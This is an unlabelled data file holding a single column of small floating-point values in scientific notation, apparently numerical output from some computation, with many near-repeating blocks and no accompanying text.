7.63535e-06
9.4269e-06
1.60637e-06
4.3332e-06
8.57331e-06
2.76272e-06
5.03618e-06
9.83669e-06
1.63511e-05
2.56491e-05
1.42219e-06
5.59806e-06
4.06345e-06
1.76538e-05
2.22966e-05
1.79155e-05
2.30772e-05
2.68898e-06
1.26363e-05
3.55489e-06
2.53784e-05
1.76024e-05
1.4606e-05
2.01555e-05
1.57905e-05
2.54339e-05
7.07828e-06
4.38055e-07
3.84537e-06
1.26213e-06
1.82329e-06
3.69072e-06
7.6346e-06
9.44173e-06
1.61078e-06
4.3912e-06
8.58339e-06
2.77365e-06
5.06111e-06
9.83527e-06
1.63756e-05
2.56625e-05
1.45378e-06
5.62036e-06
4.09154e-06
1.76962e-05
2.23185e-05
1.79308e-05
2.31428e-05
2.70915e-06
1.26592e-05
3.57757e-06
2.54213e-05
1.75844e-05
5.27285e-06
-7.77867e-06
5.26282e-06
-7.92741e-06
-3.73008e-06
5.97492e-06
-2.04605e-06
5.4967e-07
-4.38087e-07
1.87566e-06
4.55182e-06
-2.08592e-06
-3.69975e-06
-9.25646e-06
-7.98722e-06
-3.40177e-06
-2.99221e-06
-8.64814e-06
-9.92202e-06
-3.7244e-06
5.97808e-06
-2.04226e-06
5.56089e-07
-4.22695e-07
1.87705e-06
4.54562e-06
-2.12255e-06
-3.70783e-06
-9.25837e-06
-7.98959e-06
-3.38674e-06
-2.92995e-06
-8.70823e-06
-9.94891e-06
5.25295e-06
-7.9217e-06
5.19983e-06
-7.80304e-06
-3.71807e-06
5.97997e-06
-2.04474e-06
5.59848e-07
-4.33959e-07
1.88155e-06
4.55217e-06
-2.09276e-06
-3.71475e-06
-9.26415e-06
-8.03725e-06
-3.39678e-06
-3.01858e-06
-8.6798e-06
-9.97166e-06
-3.72442e-06
5.97221e-06
-2.04703e-06
5.52347e-07
-4.36199e-07
1.87731e-06
4.54666e-06
-2.13625e-06
-3.72528e-06
-9.22852e-06
-8.02548e-06
-3.42925e-06
-2.95938e-06
-8.72929e-06
-1.00121e-05
-3.72424e-06
5.9788e-06
-2.04836e-06
5.56769e-07
-4.37556e-07
1.87856e-06
4.54722e-06
-2.04816e-06
-3.67391e-06
-9.24608e-06
-8.01234e-06
-3.32732e-06
-2.897e-06
-8.82021e-06
-9.99369e-06
-3.72561e-06
5.96746e-06
-2.04663e-06
5.49105e-07
-4.37454e-07
1.8766e-06
4.54454e-06
-2.08479e-06
-3.71691e-06
-9.22324e-06
-8.03684e-06
-3.36339e-06
-2.92471e-06
-8.81678e-06
-1.00028e-05
5.31099e-06
-7.80547e-06
5.31921e-06
-7.81623e-06
-3.72882e-06
5.96853e-06
-2.04787e-06
5.50228e-07
-4.37676e-07
1.87754e-06
4.54766e-06
-2.13897e-06
-3.75381e-06
-9.29466e-06
-8.06724e-06
-3.41554e-06
-2.962e-06
-8.78889e-06
-1.00287e-05
-3.7238e-06
5.97559e-06
-2.04527e-06
5.56922e-07
-4.35159e-07
1.88062e-06
4.54796e-06
-2.07032e-06
-3.69912e-06
-9.29485e-06
-8.03467e-06
-3.34754e-06
-2.90996e-06
-8.7979e-06
-9.99951e-06
5.25233e-06
-7.88636e-06
5.2256e-06
-7.84053e-06
1.17272e-05
3.33559e-05
2.33312e-05
1.28183e-05
7.94595e-06
3.48006e-06
3.42242e-06
7.69901e-06
4.42828e-06
5.12437e-06
8.17045e-06
5.40601e-06
5.61364e-06
-2.93759e-06
5.95701e-07
2.82012e-06
-2.83772e-06
9.12993e-06
5.994e-06
-1.28099e-06
2.27541e-06
-8.05064e-07
2.57085e-06
4.44446e-06
-4.59928e-07
1.69994e-05
2.05226e-05
2.85581e-05
1.65614e-05
2.75174e-05
1.23247e-05
1.7867e-05
1.2714e-05
-2.88557e-06
4.02579e-05
1.09353e-06
1.97531e-05
-4.34719e-06
1.89265e-05
1.95718e-05
3.58322e-05
1.12502e-05
4.82239e-05
1.14238e-05
3.75278e-06
-6.01101e-06
-3.52617e-06
5.72927e-06
6.15801e-06
-4.47399e-06
1.17364e-05
3.33475e-05
2.33549e-05
1.28267e-05
5.41989e-06
5.62753e-06
-2.92583e-06
6.01953e-07
2.8335e-06
-2.82906e-06
9.14202e-06
8.00723e-06
3.40607e-06
3.45487e-06
7.76188e-06
4.4264e-06
5.15449e-06
8.32316e-06
6.01403e-06
-1.26829e-06
-7.84465e-07
2.30469e-06
2.60151e-06
-4.43051e-07
4.45072e-06
1.27201e-05
-2.84411e-06
4.02869e-05
1.10631e-06
1.97798e-05
-4.33533e-06
1.89397e-05
1.69984e-05
2.05403e-05
2.85541e-05
1.64615e-05
2.75525e-05
1.23042e-05
1.77832e-05
1.95781e-05
3.58405e-05
1.1262e-05
4.82166e-05
1.14424e-05
3.75424e-06
-6.02526e-06
-3.52233e-06
5.71427e-06
6.16213e-06
-4.46981e-06
-4.05832e-06
-4.7938e-06
-4.79929e-06
-9.92784e-06
-3.56885e-07
-7.86835e-06
-7.90549e-06
-1.64931e-05
-4.63757e-06
-1.23444e-05
-4.53359e-06
-1.16876e-05
-1.15453e-05
-1.15998e-05
-4.09013e-06
-4.80692e-06
-4.84356e-06
-9.93542e-06
-3.75261e-07
-7.88958e-06
-7.91785e-06
-1.65095e-05
-4.6369e-06
-1.2361e-05
-4.54124e-06
-1.16892e-05
-1.15508e-05
-1.16242e-05
-4.70489e-06
3.21523e-06
-6.28171e-06
-5.28704e-06
-7.5382e-06
-4.53418e-06
-2.6592e-06
-4.72331e-06
3.19192e-06
-6.29211e-06
-5.28782e-06
-7.54597e-06
-4.56573e-06
-2.66526e-06
1.17867e-05
3.33426e-05
2.33358e-05
1.28777e-05
7.98523e-06
3.46541e-06
3.4489e-06
7.67375e-06
4.43014e-06
5.13557e-06
8.22009e-06
5.43436e-06
5.62374e-06
-2.91714e-06
6.17464e-07
2.82526e-06
-2.81195e-06
9.1619e-06
6.01953e-06
-1.26549e-06
2.29582e-06
-7.64334e-07
2.58789e-06
4.45694e-06
-4.36181e-07
1.7032e-05
2.05333e-05
2.85719e-05
1.65505e-05
2.75435e-05
1.23227e-05
1.78892e-05
1.27349e-05
-2.85683e-06
4.02542e-05
1.11361e-06
1.97613e-05
-4.32778e-06
1.89525e-05
1.96039e-05
3.58358e-05
1.12662e-05
4.81683e-05
1.14733e-05
3.76664e-06
-6.00613e-06
-3.50884e-06
5.72236e-06
6.18263e-06
-4.44945e-06
-4.05553e-06
-4.80145e-06
-4.79374e-06
-9.92582e-06
-3.40069e-07
-7.86723e-06
-7.90999e-06
-1.64872e-05
-4.63207e-06
-1.2348e-05
-4.5342e-06
-1.16782e-05
-1.15376e-05
-1.16156e-05
-4.07912e-06
-4.77559e-06
-4.78562e-06
-9.92027e-06
-3.16205e-07
-7.86917e-06
-7.90768e-06
-1.65073e-05
-4.60949e-06
-1.23475e-05
-4.50421e-06
-1.16707e-05
-1.15374e-05
-1.15894e-05
-4.72483e-06
3.20993e-06
-6.29945e-06
-5.29209e-06
-7.55077e-06
-4.56514e-06
-2.66057e-06
-4.70065e-06
3.21823e-06
-6.27049e-06
-5.27409e-06
-7.53218e-06
-4.52672e-06
-2.64494e-06
1.17292e-05
3.33311e-05
2.3299e-05
1.27831e-05
7.95104e-06
3.40689e-06
3.42752e-06
7.64006e-06
4.40258e-06
5.10561e-06
8.20692e-06
5.40182e-06
5.60808e-06
-2.94361e-06
5.79394e-07
2.81465e-06
-2.84961e-06
9.11524e-06
5.98722e-06
-1.28207e-06
2.27776e-06
-8.04503e-07
2.5767e-06
4.43469e-06
-4.63201e-07
1.70076e-05
2.05195e-05
2.8551e-05
1.65331e-05
2.7515e-05
1.23112e-05
1.78528e-05
1.27049e-05
-2.88061e-06
4.02586e-05
1.08685e-06
1.97453e-05
-4.35882e-06
1.89106e-05
1.95404e-05
3.58352e-05
1.12079e-05
4.82561e-05
1.13975e-05
3.73567e-06
-6.03473e-06
-3.54925e-06
5.68788e-06
6.1272e-06
-4.49972e-06
1.17653e-05
3.33806e-05
2.33588e-05
1.2825e-05
5.40038e-06
5.63142e-06
-2.93325e-06
5.92091e-07
2.8408e-06
-2.84129e-06
9.12571e-06
7.95867e-06
3.58088e-06
3.45703e-06
7.67764e-06
4.47416e-06
5.12658e-06
8.16381e-06
5.99572e-06
-1.27456e-06
-7.93078e-07
2.28961e-06
2.59122e-06
-4.53327e-07
4.44146e-06
1.27324e-05
-2.86106e-06
4.02946e-05
1.10802e-06
1.97759e-05
-4.33987e-06
1.89414e-05
1.70406e-05
2.05255e-05
2.86183e-05
1.65267e-05
2.75655e-05
1.23144e-05
1.78868e-05
1.95525e-05
3.58739e-05
1.12399e-05
4.82506e-05
1.14303e-05
3.75713e-06
-6.02581e-06
-3.53786e-06
5.72119e-06
6.1371e-06
-4.48268e-06
1.17227e-05
3.33373e-05
2.33124e-05
1.28166e-05
7.96097e-06
3.41573e-06
3.4319e-06
7.66508e-06
4.41279e-06
5.11524e-06
8.22255e-06
5.39955e-06
5.61309e-06
-2.94137e-06
5.90925e-07
2.8194e-06
-2.8429e-06
9.12786e-06
5.99179e-06
-1.28638e-06
2.27729e-06
-8.04586e-07
2.58061e-06
4.43586e-06
-4.61199e-07
1.69968e-05
2.05268e-05
2.85772e-05
1.65231e-05
2.75219e-05
1.2305e-05
1.78458e-05
1.2712e-05
-2.88503e-06
4.02516e-05
1.08743e-06
1.97419e-05
-4.35302e-06
1.89211e-05
1.95385e-05
3.57867e-05
1.1238e-05
4.81453e-05
1.14433e-05
3.74771e-06
-6.02028e-06
-3.53625e-06
5.71596e-06
6.14482e-06
-4.47806e-06
-4.08118e-06
-4.77214e-06
-4.77005e-06
-9.91196e-06
-3.02838e-07
-7.86508e-06
-7.89961e-06
-1.65409e-05
-4.63495e-06
-1.23377e-05
-4.53887e-06
-1.16903e-05
-1.15508e-05
-1.16137e-05
-4.09473e-06
-4.79556e-06
-4.81164e-06
-9.91835e-06
-3.56524e-07
-7.87271e-06
-7.91191e-06
-1.64911e-05
-4.62594e-06
-1.2329e-05
-4.52605e-06
-1.16649e-05
-1.15427e-05
-1.15933e-05
-4.69518e-06
3.21811e-06
-6.27049e-06
-5.26309e-06
-7.52248e-06
-4.53103e-06
-2.63912e-06
-4.69827e-06
3.21844e-06
-6.26912e-06
-5.2748e-06
-7.52785e-06
-4.5313e-06
-2.64989e-06
1.17435e-05
3.33623e-05
2.33102e-05
1.27972e-05
5.40545e-06
5.61915e-06
-2.93722e-06
5.91795e-07
2.82161e-06
-2.83822e-06
9.12343e-06
7.9473e-06
3.46469e-06
3.42886e-06
7.71647e-06
4.42185e-06
5.12932e-06
8.17717e-06
5.99525e-06
-1.27807e-06
-8.04139e-07
2.27981e-06
2.57393e-06
-4.58333e-07
4.44545e-06
1.27075e-05
-2.89002e-06
4.02515e-05
1.09223e-06
1.9734e-05
-4.35021e-06
1.89132e-05
1.69975e-05
2.05196e-05
2.85645e-05
1.65096e-05
2.75074e-05
1.23086e-05
1.78688e-05
1.95234e-05
3.58337e-05
1.11965e-05
4.81698e-05
1.14344e-05
3.75371e-06
-6.01517e-06
-3.53841e-06
5.71799e-06
6.14686e-06
-4.48518e-06
1.17602e-05
3.33629e-05
2.33212e-05
1.28547e-05
5.42757e-06
5.62479e-06
-2.92908e-06
6.04257e-07
2.83622e-06
-2.82673e-06
9.14496e-06
8.00369e-06
3.55452e-06
3.47331e-06
7.72339e-06
4.46601e-06
5.15255e-06
8.26615e-06
6.01624e-06
-1.26806e-06
-7.87181e-07
2.30525e-06
2.59847e-06
-4.4299e-07
4.45299e-06
1.2734e-05
-2.87594e-06
4.02769e-05
1.10101e-06
1.97612e-05
-4.34041e-06
1.8948e-05
1.7035e-05
2.05158e-05
2.85385e-05
1.65078e-05
2.75214e-05
1.23148e-05
1.78887e-05
1.95615e-05
3.58648e-05
1.12713e-05
4.82676e-05
1.14247e-05
3.74618e-06
-6.02342e-06
-3.53118e-06
5.71094e-06
6.15104e-06
-4.4823e-06
-4.038e-06
-4.82535e-06
-4.79486e-06
-9.9204e-06
-3.79549e-07
-7.8525e-06
-7.90164e-06
-1.64759e-05
-4.62983e-06
-1.23372e-05
-4.5332e-06
-1.16679e-05
-1.1539e-05
-1.15961e-05
-4.10097e-06
-4.8077e-06
-4.81927e-06
-9.93314e-06
-3.4439e-07
-7.88245e-06
-7.92393e-06
-1.65532e-05
-4.63776e-06
-1.23566e-05
-4.5441e-06
-1.16987e-05
-1.15561e-05
-1.16397e-05
-4.73003e-06
3.17071e-06
-6.30724e-06
-5.3094e-06
-7.55909e-06
-4.57286e-06
-2.68437e-06
-4.71652e-06
3.19727e-06
-6.28868e-06
-5.28729e-06
-7.54351e-06
-4.54371e-06
-2.66653e-06
-3.98195e-06
-2.01277e-06
-6.9403e-06
-2.75768e-06
-6.57403e-06
-6.51367e-06
-6.9451e-06
-3.02315e-06
-3.527e-07
-9.51554e-07
-5.59138e-06
-6.0974e-06
-5.39993e-06
-7.45043e-06
-9.62923e-06
-1.67261e-06
-7.02135e-06
-8.39397e-06
-2.00353e-06
-5.94346e-06
-2.8491e-06
-1.45877e-06
-2.86025e-06
-7.93585e-06
-8.89225e-06
-9.61118e-06
-3.07732e-06
-1.01036e-05
-1.50946e-05
-1.15084e-05
-1.81097e-05
-7.52476e-06
-3.98131e-06
-1.98003e-06
-6.95485e-06
-2.75441e-06
-6.58927e-06
-6.54028e-06
-6.98597e-06
-3.04409e-06
-3.51562e-07
-9.58767e-07
-5.66172e-06
-6.21147e-06
-5.44464e-06
-7.62941e-06
-9.63734e-06
-1.6781e-06
-7.03645e-06
-8.42213e-06
-2.00626e-06
-5.95785e-06
-2.8574e-06
-1.38133e-06
-2.83147e-06
-8.01639e-06
-8.96111e-06
-9.63394e-06
-3.08302e-06
-1.01229e-05
-1.51264e-05
-1.15043e-05
-1.81593e-05
-7.53845e-06
1.48623e-06
-3.95147e-06
-5.02393e-07
-4.17433e-06
-5.40855e-06
-2.64354e-06
-7.13547e-06
2.90786e-07
1.38975e-06
3.01999e-06
1.54516e-07
-5.12942e-06
-7.33532e-07
-4.55683e-06
-1.93579e-06
-6.13375e-06
-7.66163e-07
-3.67989e-06
-2.67824e-06
-8.90559e-06
-1.1494e-06
1.48384e-06
-3.94573e-06
-4.93112e-07
-4.16758e-06
-5.37874e-06
-2.65031e-06
-7.08767e-06
2.93423e-07
1.43415e-06
3.02795e-06
1.54413e-07
-5.11646e-06
-7.36638e-07
-4.52173e-06
-1.91778e-06
-6.11808e-06
-7.64234e-07
-3.6633e-06
-2.67328e-06
-8.85356e-06
-1.14095e-06
-3.98678e-06
-1.99732e-06
-6.95833e-06
-2.76596e-06
-6.58706e-06
-6.52894e-06
-6.99113e-06
-3.0261e-06
-3.42497e-07
-9.59696e-07
-5.60984e-06
-6.12586e-06
-5.41269e-06
-7.4974e-06
-9.62927e-06
-1.67948e-06
-7.03417e-06
-8.41527e-06
-2.00359e-06
-5.94471e-06
-2.85904e-06
-1.44232e-06
-2.89455e-06
-7.96986e-06
-8.96352e-06
-9.6384e-06
-3.08311e-06
-1.01188e-05
-1.51203e-05
-1.15042e-05
-1.81621e-05
-7.53986e-06
-3.97634e-06
-1.9923e-06
-6.93915e-06
-2.74746e-06
-6.57126e-06
-6.50923e-06
-6.9598e-06
-3.01413e-06
-2.79971e-07
-9.22273e-07
-5.57671e-06
-6.06664e-06
-5.39242e-06
-7.41144e-06
-9.63461e-06
-1.67413e-06
-7.02817e-06
-8.3982e-06
-2.00501e-06
-5.94678e-06
-2.85053e-06
-1.40216e-06
-2.83477e-06
-7.93925e-06
-8.95174e-06
-9.60745e-06
-3.07657e-06
-1.01032e-05
-1.50869e-05
-1.15006e-05
-1.80998e-05
-7.52181e-06
1.4785e-06
-3.9761e-06
-5.07202e-07
-4.18961e-06
-5.44993e-06
-2.67434e-06
-7.14635e-06
2.85895e-07
1.37608e-06
3.01167e-06
1.4517e-07
-5.13667e-06
-7.38061e-07
-4.56269e-06
-1.93543e-06
-6.1311e-06
-7.64687e-07
-3.67642e-06
-2.67659e-06
-8.89681e-06
-1.14789e-06
1.47738e-06
-3.95412e-06
-5.12272e-07
-4.18968e-06
-5.35758e-06
-2.64853e-06
-7.10882e-06
2.92025e-07
1.49312e-06
3.03874e-06
1.24928e-07
-5.1023e-06
-7.62739e-07
-4.48071e-06
-1.97523e-06
-6.16392e-06
-7.86287e-07
-3.61373e-06
-2.73144e-06
-8.8554e-06
-1.14552e-06
1.49571e-06
-3.96853e-06
-5.00962e-07
-4.16123e-06
-5.3483e-06
-2.62959e-06
-7.11154e-06
2.93625e-07
1.31432e-06
3.00496e-06
1.5723e-07
-5.11628e-06
-7.20512e-07
-4.58702e-06
-1.92575e-06
-6.14741e-06
-7.66233e-07
-3.67216e-06
-2.67602e-06
-8.89033e-06
-1.14542e-06
1.48104e-06
-4.00529e-06
-5.11637e-07
-4.18143e-06
-5.38031e-06
-2.65473e-06
-7.14149e-06
2.79967e-07
1.27522e-06
2.98811e-06
1.38289e-07
-5.1446e-06
-7.3569e-07
-4.62135e-06
-1.93372e-06
-6.16111e-06
-7.66451e-07
-3.67922e-06
-2.67852e-06
-8.90921e-06
-1.14811e-06
-3.9766e-06
-1.9834e-06
-6.94304e-06
-2.75047e-06
-6.57338e-06
-6.51578e-06
-6.96411e-06
-3.02296e-06
-2.8886e-07
-9.33219e-07
-5.5972e-06
-6.0909e-06
-5.4063e-06
-7.46397e-06
-9.63057e-06
-1.67765e-06
-7.02777e-06
-8.41709e-06
-2.00702e-06
-5.95281e-06
-2.85972e-06
-1.39193e-06
-2.8424e-06
-7.95321e-06
-8.95032e-06
-9.62078e-06
-3.08331e-06
-1.01127e-05
-1.51123e-05
-1.1507e-05
-1.81327e-05
-7.53964e-06
-3.97036e-06
-1.97489e-06
-6.93045e-06
-2.74825e-06
-6.57014e-06
-6.51228e-06
-6.95464e-06
-3.03363e-06
-3.30196e-07
-9.45586e-07
-5.60635e-06
-6.16005e-06
-5.41487e-06
-7.50075e-06
-9.63106e-06
-1.67859e-06
-7.02878e-06
-8.41753e-06
-2.00959e-06
-5.95329e-06
-2.86061e-06
-1.39892e-06
-2.85188e-06
-7.94296e-06
-8.92649e-06
-9.62835e-06
-3.08304e-06
-1.0114e-05
-1.51201e-05
-1.15083e-05
-1.81593e-05
-7.54251e-06
1.45769e-06
-4.00812e-06
-5.18361e-07
-4.16721e-06
-5.41483e-06
-2.64149e-06
-7.13137e-06
2.90989e-07
1.29296e-06
2.99665e-06
1.50049e-07
-5.12996e-06
-7.26356e-07
-4.59489e-06
-1.92789e-06
-6.15482e-06
-7.65658e-07
-3.68274e-06
-2.67575e-06
-8.90043e-06
-1.148e-06
1.4887e-06
-3.97662e-06
-5.1099e-07
-4.17152e-06
-5.37558e-06
-2.64351e-06
-7.12724e-06
2.93479e-07
1.31127e-06
3.00373e-06
1.50964e-07
-5.12256e-06
-7.23624e-07
-4.59643e-06
-1.9209e-06
-6.14237e-06
-7.63358e-07
-3.66684e-06
-2.67064e-06
-8.87966e-06
-1.14194e-06
-4.00537e-06
-2.04427e-06
-6.97764e-06
-2.79539e-06
-6.6049e-06
-6.55808e-06
-7.03225e-06
-3.03433e-06
-3.42705e-07
-9.70216e-07
-5.61725e-06
-6.08818e-06
-5.41391e-06
-7.45951e-06
-9.64326e-06
-1.68124e-06
-7.04284e-06
-8.40863e-06
-2.0035e-06
-5.94915e-06
-2.85358e-06
-1.5061e-06
-2.92594e-06
-8.03988e-06
-9.07384e-06
-9.66069e-06
-3.08804e-06
-1.01328e-05
-1.51285e-05
-1.15128e-05
-1.8192e-05
-7.54072e-06
-3.97987e-06
-2.01982e-06
-6.93649e-06
-2.76504e-06
-6.5709e-06
-6.50059e-06
-6.93525e-06
-3.02358e-06
-3.54412e-07
-9.62155e-07
-5.58788e-06
-6.07899e-06
-5.39744e-06
-7.46461e-06
-9.62717e-06
-1.67275e-06
-7.02067e-06
-8.39062e-06
-2.00037e-06
-5.9379e-06
-2.84729e-06
-1.52398e-06
-2.91963e-06
-7.92379e-06
-8.86717e-06
-9.61272e-06
-3.07761e-06
-1.01024e-05
-1.509e-05
-1.1497e-05
-1.80973e-05
-7.52866e-06
7.09846e-06
2.18867e-06
5.77193e-07
5.81024e-06
1.33946e-05
5.50133e-06
4.87683e-06
7.11579e-06
2.20055e-06
6.04466e-07
5.86957e-06
1.34295e-05
5.52228e-06
4.87581e-06
-8.25348e-07
-9.66671e-06
-1.87788e-06
3.94674e-06
1.12814e-05
2.14564e-05
9.26488e-08
3.796e-06
7.01968e-06
1.31888e-05
5.64657e-06
3.14954e-06
-8.01709e-07
-9.66046e-06
-1.85878e-06
3.95145e-06
1.13354e-05
2.14519e-05
8.30895e-08
3.85972e-06
7.16173e-06
1.31675e-05
5.64974e-06
3.14514e-06
7.13029e-06
2.18963e-06
5.84487e-07
5.84355e-06
1.34516e-05
5.57481e-06
4.8803e-06
7.08947e-06
2.1503e-06
5.97176e-07
5.86493e-06
1.34558e-05
5.58795e-06
4.83889e-06
-8.03356e-07
-9.6597e-06
-1.86551e-06
3.95781e-06
1.13297e-05
2.14883e-05
1.12932e-07
3.82803e-06
7.09361e-06
1.32428e-05
5.65839e-06
3.18018e-06
-7.96558e-07
-9.65947e-06
-1.87308e-06
3.95899e-06
1.13422e-05
2.14626e-05
7.90145e-08
3.84009e-06
7.16597e-06
1.31786e-05
5.5972e-06
3.13332e-06
-2.12598e-05
-5.31796e-06
-5.2893e-06
-1.23154e-05
-1.23082e-05
-8.33188e-06
-2.56395e-06
1.03469e-05
-3.5658e-06
1.26089e-06
-2.72556e-06
-6.42535e-06
1.80665e-06
-7.75194e-06
1.03479e-05
-3.57767e-06
1.28014e-06
-2.72829e-06
-6.42962e-06
1.80371e-06
-7.75308e-06
-4.91487e-06
1.85333e-06
1.91041e-06
-5.81313e-06
-5.79098e-06
-5.32111e-06
3.58768e-07
-1.36232e-06
-6.54571e-06
-4.16089e-06
-4.93729e-06
-1.39412e-06
-6.10056e-07
-7.60251e-06
-1.35686e-06
-6.56125e-06
-4.15666e-06
-4.938e-06
-1.39369e-06
-6.09699e-07
-7.60505e-06
-8.09989e-07
-9.65653e-06
-1.87067e-06
3.95565e-06
1.13364e-05
2.1461e-05
1.006e-07
3.82786e-06
7.09301e-06
1.31764e-05
5.61222e-06
3.14639e-06
-8.04797e-07
-9.63738e-06
-1.87056e-06
3.97041e-06
1.13192e-05
2.14575e-05
1.01246e-07
3.85419e-06
7.1205e-06
1.31759e-05
5.62282e-06
3.15971e-06
7.12165e-06
2.19494e-06
5.9273e-07
5.83469e-06
1.34542e-05
5.54715e-06
4.89908e-06
-2.12121e-05
-5.31117e-06
-5.2841e-06
-1.22906e-05
-1.22873e-05
-8.31671e-06
-2.55965e-06
1.03707e-05
-3.55998e-06
1.26902e-06
-2.71285e-06
-6.41491e-06
1.81726e-06
-7.73944e-06
1.03761e-05
-3.558e-06
1.28798e-06
-2.70776e-06
-6.41065e-06
1.82282e-06
-7.73048e-06
-4.91174e-06
1.88156e-06
1.89277e-06
-5.79243e-06
-5.78202e-06
-5.30591e-06
3.67183e-07
-1.35867e-06
-6.54443e-06
-4.14931e-06
-4.92362e-06
-1.3886e-06
-6.05237e-07
-7.59106e-06
-1.35615e-06
-6.55197e-06
-4.14789e-06
-4.91918e-06
-1.39013e-06
-6.03221e-07
-7.58321e-06
-7.80191e-07
-9.65416e-06
-1.83747e-06
3.95816e-06
1.13884e-05
2.14637e-05
9.82828e-08
3.89031e-06
7.20565e-06
1.31229e-05
5.58003e-06
3.14454e-06
-7.85733e-07
-9.64639e-06
-1.8438e-06
3.96404e-06
1.13796e-05
2.1487e-05
9.89054e-08
3.87164e-06
7.20089e-06
1.31945e-05
5.6138e-06
3.15284e-06
7.1282e-06
2.22001e-06
5.89282e-07
5.83155e-06
1.34208e-05
5.4758e-06
4.89021e-06
-2.12337e-05
-5.31849e-06
-5.28436e-06
-1.2313e-05
-1.22925e-05
-8.31969e-06
-2.55936e-06
1.03596e-05
-3.54288e-06
1.27471e-06
-2.71067e-06
-6.41439e-06
1.8139e-06
-7.72779e-06
1.03558e-05
-3.56068e-06
1.29509e-06
-2.70237e-06
-6.4196e-06
1.82132e-06
-7.72727e-06
-4.8737e-06
1.88625e-06
1.93602e-06
-5.79e-06
-5.77173e-06
-5.30315e-06
3.78578e-07
-1.36052e-06
-6.52838e-06
-4.15507e-06
-4.92259e-06
-1.38357e-06
-6.03759e-07
-7.57799e-06
-1.34806e-06
-6.5315e-06
-4.13406e-06
-4.91214e-06
-1.37823e-06
-5.99171e-07
-7.56885e-06
7.07288e-06
2.15135e-06
5.75257e-07
5.85332e-06
1.3438e-05
5.55197e-06
4.81331e-06
7.11261e-06
2.19055e-06
5.87277e-07
5.85138e-06
1.34433e-05
5.57983e-06
4.87026e-06
-2.12326e-05
-5.31513e-06
-5.28817e-06
-1.22996e-05
-1.23044e-05
-8.32358e-06
-2.56119e-06
1.03279e-05
-3.55506e-06
1.26868e-06
-2.7185e-06
-6.42832e-06
1.79436e-06
-7.73808e-06
1.03556e-05
-3.57011e-06
1.2884e-06
-2.71835e-06
-6.42956e-06
1.80401e-06
-7.7426e-06
-4.90106e-06
1.84274e-06
1.90885e-06
-5.79948e-06
-5.78332e-06
-5.31448e-06
3.48909e-07
-1.35772e-06
-6.5333e-06
-4.14959e-06
-4.922e-06
-1.38316e-06
-6.03221e-07
-7.58004e-06
-1.35453e-06
-6.55055e-06
-4.15288e-06
-4.92377e-06
-1.38392e-06
-6.02904e-07
-7.58539e-06
-4.74593e-07
-3.45289e-06
-8.93299e-06
-5.46645e-06
-8.55792e-06
-8.63826e-06
-3.25088e-07
-4.98592e-07
-3.44021e-06
-8.96669e-06
-5.52103e-06
-8.60894e-06
-8.67352e-06
-3.52004e-07
1.89915e-06
1.43966e-06
9.78111e-07
-2.68176e-06
-5.66492e-06
-5.38567e-06
-2.19678e-06
-5.41481e-07
-2.46967e-06
-1.6496e-06
-6.03786e-06
-6.37622e-06
-8.03985e-06
-5.37955e-06
-1.91356e-06
-6.04646e-06
-3.38155e-06
-6.48118e-06
-7.34708e-06
-7.39387e-06
-6.17261e-06
-1.91454e-06
-4.58873e-06
-1.46009e-06
-5.91021e-06
-4.9113e-06
-4.49358e-06
-4.93467e-06
-8.8985e-06
-9.27988e-06
-2.44824e-06
-1.86253e-06
-6.64639e-06
-7.34685e-06
-3.09035e-06
-1.35382e-05
-8.65069e-06
-2.47039e-06
-6.79389e-06
-1.02431e-05
-6.38444e-06
-1.42212e-05
-1.7447e-06
-7.25498e-06
-7.23004e-06
-3.01907e-06
-3.11071e-06
-1.27665e-06
-7.50071e-06
-9.12214e-06
-5.81538e-06
-7.00541e-06
-1.56755e-06
-9.28669e-06
-1.05297e-05
-6.77903e-06
-1.0863e-05
-6.92698e-06
-3.14825e-06
-6.41597e-06
1.91811e-06
1.46748e-06
9.94883e-07
-2.65525e-06
-5.61513e-06
-5.32768e-06
-2.16829e-06
-5.31491e-07
-2.44782e-06
-1.63903e-06
-6.02996e-06
-6.35386e-06
-8.03093e-06
-5.36557e-06
-1.92214e-06
-6.03093e-06
-3.38529e-06
-6.47243e-06
-7.34455e-06
-7.39445e-06
-6.1709e-06
-1.89589e-06
-4.54989e-06
-1.4496e-06
-5.90418e-06
-4.91759e-06
-4.49377e-06
-4.94051e-06
-8.90822e-06
-9.31354e-06
-2.45083e-06
-1.88177e-06
-6.65591e-06
-7.38559e-06
-3.10263e-06
-1.3518e-05
-8.6473e-06
-2.47161e-06
-6.78868e-06
-1.02527e-05
-6.37783e-06
-1.41943e-05
-1.78729e-06
-7.18078e-06
-7.1672e-06
-3.03167e-06
-3.15418e-06
-1.33715e-06
-7.47826e-06
-9.1142e-06
-5.77373e-06
-7.00449e-06
-1.5323e-06
-9.42229e-06
-1.06236e-05
-6.7806e-06
-1.083e-05
-6.92989e-06
-3.39315e-06
-6.40529e-06
-4.7271e-07
-3.40979e-06
-8.97676e-06
-5.52935e-06
-8.65667e-06
-8.71126e-06
-2.67592e-07
-4.80975e-07
-3.42917e-06
-8.92172e-06
-5.44403e-06
-8.5224e-06
-8.62065e-06
-3.4851e-07
1.96915e-06
1.46499e-06
1.00769e-06
-2.6641e-06
-5.60111e-06
-5.36202e-06
-2.16762e-06
-1.91698e-06
-6.04427e-06
-3.39223e-06
-6.47115e-06
-7.35155e-06
-7.38907e-06
-6.18481e-06
-5.70508e-07
-2.46116e-06
-1.65486e-06
-6.00455e-06
-6.29347e-06
-7.91877e-06
-5.35734e-06
-4.58598e-06
-1.9109e-06
-1.46845e-06
-5.89437e-06
-4.90173e-06
-4.92176e-06
-4.48234e-06
-8.92065e-06
-9.2815e-06
-1.87562e-06
-2.45763e-06
-7.35276e-06
-6.66087e-06
-3.11411e-06
-1.35324e-05
-8.65171e-06
-2.47198e-06
-6.79269e-06
-1.02414e-05
-6.39348e-06
-1.42121e-05
-1.79927e-06
-7.31872e-06
-7.26781e-06
-3.05562e-06
-3.20624e-06
-1.34997e-06
-7.48283e-06
-9.12763e-06
-5.8234e-06
-6.98915e-06
-1.68183e-06
-9.29865e-06
-1.04887e-05
-6.76962e-06
-1.08329e-05
-6.9226e-06
-3.08603e-06
-6.41315e-06
1.92081e-06
1.45228e-06
9.82784e-07
-2.69236e-06
-5.67668e-06
-5.43347e-06
-2.19894e-06
-6.08002e-07
-2.46815e-06
-1.66336e-06
-5.9939e-06
-6.33407e-06
-7.90001e-06
-5.36398e-06
-1.93374e-06
-6.05345e-06
-3.39748e-06
-6.46147e-06
-7.35407e-06
-7.39082e-06
-6.18016e-06
-1.91329e-06
-4.59123e-06
-1.46893e-06
-5.90003e-06
-4.90592e-06
-4.48781e-06
-4.92793e-06
-8.89831e-06
